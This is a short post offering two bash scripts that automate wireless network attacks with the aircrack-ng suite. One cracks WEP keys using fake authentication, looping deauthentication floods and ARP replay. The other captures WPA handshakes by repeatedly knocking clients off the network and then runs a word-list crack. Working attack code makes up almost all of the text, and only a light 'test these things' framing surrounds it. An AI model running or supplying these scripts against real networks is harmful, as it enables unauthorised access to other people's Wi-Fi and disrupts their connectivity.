We all know that Wired Equivalency Privacy is entirely breakable and that Wireless Protected Access can be broken using a word-list or hash-tables. Here are a couple scripts to HELP you test these things. Make sure aircrack-ng in installed.
#!/bin/bash
##
### Automatic wep-cracking script(run this as ROOT): by frogbong(frogbong.wilson@gmail.com)
## Note: This script will not work 100% of the time, it is merely a way to reduce typing
#
export IFACE
export BSSID
export CHANNEL
### Check for argument
if [ -z $1 ]
then echo "Usage: $0 <interface>"
echo "Set MONITOR mode interface."
exit
fi
### Start airodump-ng to collect target information
IFACE=$1
sudo airodump-ng $IFACE
echo "### TARGET INFORMATION ###"
echo "Enter BSSID: "; read BSSID
echo "Enter AP Channel: "; read CHANNEL
echo "Enter Target MAC(optional): "; read CLNTMAC
echo "Starting auto-wep.sh with these parameters: "
echo " Interface: $IFACE"; sleep 1
echo " BSSID: $BSSID"; sleep 1
echo " Channel: $CHANNEL"; sleep 1
### Start wep cracking process using components of aircrack-ng in the background (&)
# Start airodump-ng
xterm -e "sudo airodump-ng --bssid $BSSID --channel $CHANNEL -w AUTO-WEP $IFACE" &
# Start aireplay-ng for fake auth.
sleep 3
xterm -e "sudo aireplay-ng -1 0 $IFACE -a $BSSID" &
# Wait for fake association before deauth.
sleep 5
xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; sleep 10; done" &
# Start aireplay-ng for ARP replay
xterm -e "sudo aireplay-ng -3 $IFACE -b $BSSID" &
# Start cracking .cap file after giving some time to generate initialization vectors(iv's)
sleep 60
sudo aircrack-ng AUTO-WEP*.cap
#!/bin/bash
##
### Script to help capture wpa-handshake(run this as ROOT): by frogbong(frogbong.wilson@gmail.com)
##
#
export IFACE
export BSSID
export CHANNEL
export TIME # time between deauth. broadcast
export CLIENT # client to deauth. (optional)
### Check for argument
if [ -z $1 ]
then echo "Usage: $0 <interface>"
echo "Set MONITOR mode interface."
exit
fi
### Start airodump-ng to collect target information
IFACE=$1
sudo airodump-ng $IFACE
echo "### TARGET INFORMATION ###"
echo "Enter BSSID: "; read BSSID
echo "Enter AP Channel: "; read CHANNEL
echo "Enter deauth. delay: "; read TIME
echo "Enter client(optional): "; read CLIENT
echo "Starting $0 with these parameters: "
echo " Interface: $IFACE"; sleep 1
echo " BSSID: $BSSID"; sleep 1
echo " Channel: $CHANNEL"; sleep 1
echo " Time Delay: $TIME"; sleep 1
if [ "$CLIENT" != "" ]
then echo " Client: $CLIENT"; sleep 1
fi
### Start capture and regular deauth.
# Start airodump-ng to capture handshake
sudo xterm -e "airodump-ng --bssid $BSSID --channel $CHANNEL -w WPA-HS $IFACE" &
# Start deauth every 20 minutes
sleep 3 # wait for airodump to startup
if [ "$CLIENT" != "" ]
then xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID -c $CLIENT; echo 'Sleeping for $TIME seconds'; sleep $TIME; done" &
fi
if [ "$CLIENT" = "" ]
then xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; echo 'Sleeping for $TIME second(s)'; sleep $TIME; done" &
fi
# Start aircrack-ng in wpa mode to parse the .cap file for handshakes
while true; do aircrack-ng -a 2 WPA*.cap -w /usr/share/dict/american-english; sleep 30; done
